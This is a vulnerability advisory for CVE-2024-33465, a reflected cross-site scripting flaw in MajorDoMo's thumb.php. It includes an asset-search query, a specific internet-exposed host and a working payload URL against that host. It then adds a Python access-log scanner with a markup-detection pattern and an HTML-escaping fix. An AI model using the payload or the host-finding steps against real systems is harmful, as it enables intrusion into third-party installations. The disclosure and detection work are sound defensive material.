CVE-2024-33465
BUG_Author: hbzms
Vendor: https://majordomo.smartliving.ru/
Vulnerability description
Cross Site Scripting vulnerability in MajorDoMo before v.0662e5e allows an attacker to escalate privileges via the thumb/thumb.php component.
Affected scope
MajorDoMo < 0662e5e
Vulnerability reproduction
app="MajordomoSL"
Find related assets with the above search query (one asset is used here as an example):
http://95.110.79.90:9090/
Visit the above URL, then append the payload to it.
The payload is as follows:
http://95.110.79.90:9090/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%3Cimg%20src=1%20onerror=alert(1)%3E
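The payload above reflects the `transport` query parameter into the debug output of thumb.php without HTML encoding. The following is an added detection example, not code from this advisory or from the MajorDoMo project: it scans web-server access-log lines for requests to modules/thumb/thumb.php whose parameters carry HTML markup, decodes the base64 `url` parameter for the analyst, and shows the output-encoding step that closes the hole. The log lines, IP addresses and host names are constructed; the assumption that `url` is a base64-encoded stream URL is inferred from the payload on this page.

```python
import base64
import binascii
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined format); the IPs and
# the "cam" host are placeholders, not real systems.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /modules/thumb/thumb.php?url=aHR0cDovL2NhbS9zbmFwLmpwZw==&transport=tcp HTTP/1.1" 200 512
10.0.0.9 - - [10/May/2024:12:00:07 +0000] "GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%3Cimg%20src=1%20onerror=alert(1)%3E HTTP/1.1" 200 2048
10.0.0.9 - - [10/May/2024:12:00:09 +0000] "GET /index.php HTTP/1.1" 200 100
"""

# Client IP, timestamp, method, request target and status from one log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markup that should never appear in a thumbnail-fetch parameter: a tag
# opener, an on* event-handler attribute, or a javascript: URL.
MARKUP_RE = re.compile(r'<\s*[a-z!/]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)

THUMB_PATH = '/modules/thumb/thumb.php'


def decode_url_param(value):
    """Decode the base64 'url' parameter (assumed to be the stream URL, as in
    the page's payload). Returns None when the value is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode('utf-8', 'replace')
    except (binascii.Error, ValueError):
        return None


def analyze_request(target):
    """Return a finding for a thumb.php request whose parameters contain HTML
    markup, or None for any other request."""
    parts = urlsplit(target)
    if not parts.path.endswith(THUMB_PATH):
        return None
    # parse_qs percent-decodes values, so %3Cimg%20... becomes <img ...
    params = parse_qs(parts.query, keep_blank_values=True)
    suspicious = {name: value
                  for name, values in params.items()
                  for value in values
                  if MARKUP_RE.search(value)}
    if not suspicious:
        return None
    return {
        'debug': params.get('debug', [''])[0] == '1',   # reflection happens in debug mode
        'decoded_url': decode_url_param(params.get('url', [''])[0]),
        'suspicious_params': suspicious,
    }


def scan_log(text):
    """Run analyze_request over every parsable line and collect the findings."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        finding = analyze_request(match.group('target'))
        if finding:
            finding.update(ip=match.group('ip'), status=int(match.group('status')))
            findings.append(finding)
    return findings


def render_safely(value):
    """Mitigation side: HTML-encode a request value before echoing it into a
    debug page, so a tag in 'transport' is shown as text, not executed."""
    return html.escape(value, quote=True)


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The scanner keys on the path and on markup in any parameter rather than on the exact payload, so encoding variants of the same reflected-XSS pattern are still caught; `render_safely` is the encoding a fixed thumb.php would apply to every reflected value.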
Repair suggestions
Turn off Internet exposure of the interface, or restrict access to its settings.